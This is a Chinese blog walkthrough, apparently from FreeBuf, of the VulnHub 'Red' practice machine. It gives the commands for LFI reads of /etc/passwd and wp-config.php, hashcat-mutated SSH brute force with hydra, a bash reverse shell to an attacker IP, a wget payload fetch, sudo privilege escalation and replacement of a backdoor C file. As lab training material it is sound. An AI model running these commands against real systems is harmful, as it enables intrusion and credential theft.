freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

Red靶机渗透
hailong86 2022-05-19 11:50:15 142803
所属地 吉林省

1.靶机介绍

靶机下载地址:https://www.vulnhub.com/entry/red-1,753/
靶机提示:
Description
Red has taken over your system, are you able to regain control?
This works better on VirtualBox rather than VMware。
靶机地址:10.8.1.150
提示系统已经被控制,说明存在后门。

2.端口发现

扫描靶机信息,发现开放了22、25、80、110端口,WordPress 5.8.1、robots.txt等
图片.png

3.访问web

访问web
图片.png
访问robots.txt,有wp,无法访问,那就目录扫描一下
图片.png

4.目录扫描

扫描目录,扫到了wp的登录页面和配置页面等
图片.png
smseek扫描网站,发现用户administrator
图片.png
爆破登录未成功,继续浏览网站,得到域名主机redrocks.win,加入到hosts文件
图片.png
图片.png
成功访问,根据页面信息提示网站已经被入侵,并且提到有后门,暂时也没发现什么,那就扫描一下后门文件,因为 WordPress 在 Apache PHP上运行。所以应该是 php 后门
图片.png
利用gobuster dir -w /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt -x .php,.txt -u http://redrocks.win扫描一下后门文件,得到NetworkFileManagerPHP.php
图片.png

5.wfuzz参数

Google上搜索一下NetworkFileManagerPHP.php发现是个 webshell 后门,扫描结果状态码是 500,这个脚本可能存在 LFI ,发现其中指向了gitub上的一个字典,正好kali上也是自带这个字典的
图片.png
wfuzz -c -u 'http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test' -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt使用 wfuzz 测试一下参数,发现参数key
图片.png
http://redrocks.win/NetworkFileManagerPHP.php?key=cat%20../../../../../../../../../etc/passwd,利用key参数成功查看到/etc/passwd的内容,发现3个用户john、ippsec、oxdf
图片.png

6.渗透测试

尝试查看NetworkFileManagerPHP.php后门文件,想到了php://filter (是一种设计用来允许过滤器程序在打开时成为流的封装协议。)利用burpsuite抓包,然后构造payload:/NetworkFileManagerPHP.php?key=php://filter/convert.base64-encode/recource=NetworkFileManagerPHP.php ,成功返回base64代码
图片.png
利用echo解密,得到代码
图片.png
然后将注释内容解密,得到提示利用Hashcat规则进行解密
图片.png
/NetworkFileManagerPHP.php?key=php://filter/read=convert.base64-encode/resource=wp-config.php直接查看网站配置文件,得到base64代码
图片.png
成功解出 'DB_NAME', 'wordpress' ,'DB_USER', 'john','DB_PASSWORD', 'R3v_m4lwh3r3_k1nG!!'
图片.png
图片.png
图片.png
之前查看/etc/passwd有john的用户名,利用用户名john和R3v_m4lwh3r3_k1nG!!登录失败
图片.png
刚刚破解注释内容的时候提示使用hashcat规则进行破解,将R3v_m4lwh3r3_k1nG!!写入文件中,利用 hashcat --stdout pass.txt -r /usr/share/hashcat/rules/best64.rule > passwd.txt 生成字典
图片.png
图片.png

7.反弹shell

hydra -l john -P passwd.txt ssh://10.8.1.150 -t 4爆破john的ssh密码,成功得到密码r3v_m4lwh3r3_k1nG!!,但是不一会就被踢出来了
图片.png
echo "bash -c 'bash -i >& /dev/tcp/10.8.1.169/1234 0>&1'" >>shell.sh利用nc建立稳定的反弹连接
图片.png
图片.png

8.权限提升

sudo -l,发现john可以不需要密码执行ippsec用户的/usr/bin/time,发现又被踢出来了。。。看样子是john这个用户的问题,那就尝试连接到ippsec用户
图片.png
查找到time提权的方式
图片.png
执行sudo -u ippsec /usr/bin/time /bin/bash,成功切换ippsec用户,在 /dev/shm 目录中创建一个反向 shell bash 脚本,在 kali 上运行 nc -lvvp 1234 和 执行 shell 脚本,但是过一段时间还是被踢出来
图片.png
为了防止被踢出来,创建一个shell
1.python3 -c 'import pty;pty.spawn("/bin/bash")'
2.export TERM=xterm然后 Ctrl+Z 退出来一下
3.stty raw -echo;fg回车后输入 reset 再回车
图片.png
图片.png
查看ippsec目录下的user.txt,提示说是假的flag,你甚至没有使用正确的用户,看着好别扭,利用python3 -c 'import pty;pty.spawn("/bin/bash")'再升级下shell,发现cat命令调用的是vi,而vi是cat。。。
图片.png
图片.png
python -m http.server 8000 本机开启临时http
靶机wget http://10.8.1.169:8000/pspy64下载pspy64文件
图片.png
赋权,执行
图片.png
这应该是他对系统的后门,查看一下这个 supersecretfileuc.c文件,发现是定时弹出的脚本,所以只需要上传一个提权的脚本将此脚本进行替换即可
图片.png
图片.png
生成C 编写的 shell 替换掉原来的 supersecretfileuc.c,选择/bin/bash生成shell写入到本地supersecretfileuc.c文件
图片.png
先删除/var/www/wordpress/.git下的rev和supersecretfileuc.c文件
本机开启python -m http.server 8000,靶机下载wget http://10.8.1.169:8000/supersecretfileuc.c编辑好的文件
图片.png
本机nc -lvnp 9001开启监听,等一会之后成功连接,拿到root权限,拿到flag
图片.png

9.总结

这个靶机还是挺有难度的,之前打了好久才打通关,这里的知识点也很多,是非常值得练习的一个靶机。

# 渗透测试 # 网络安全 # web安全 # 系统安全 # 漏洞分析
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 hailong86 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
hailong86 LV.5
这家伙太懒了,还未填写个人描述!
  • 25 文章数
  • 11 关注者
Vikings靶机渗透
2023-03-03
HA Rudra靶机渗透
2022-12-18
EVM靶机通关
2022-12-05
文章目录